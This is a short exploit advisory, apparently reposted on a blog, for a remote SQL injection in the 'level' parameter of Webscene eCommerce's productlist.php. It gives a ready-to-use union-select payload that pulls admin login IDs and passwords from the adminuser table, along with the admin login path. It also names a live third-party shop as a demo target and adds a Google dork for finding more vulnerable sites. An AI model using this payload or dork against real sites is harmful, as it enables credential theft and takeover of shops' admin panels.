############################################
Webscene eCommerce (level) Remote Sql Injection
vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#############################################
Bug Found By :Angela Chang (12-10-2008)
contact: angel@ch4ng.cc
#######################################
Greetz: nyubi & Vrs-Chk
especially thx to str0ke @ milw0rm.com
############################################
vuln file : productlist.php
Input passed to the "level" is not properly verified
before being used. This can be exploited to execute
remote sql injection.
exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--
Login admin : http://somehost/admin/
Demo Site : http://www.abcbeautyshop.co.uk/productlist.php?categoryid=20&level=-4%20union%20select%20concat(loginid,0x2f,password)%20from%20adminuser--
Google dork : inurl:productlist.php?categoryid= level
#############################################
http://www.securityfocus.com/archive/1/497324/30/0/threaded
bug pertama ku , ehheeeheh pertama kali belajar sql ya dapatlha ini bug...
0 komentar:
Posting Komentar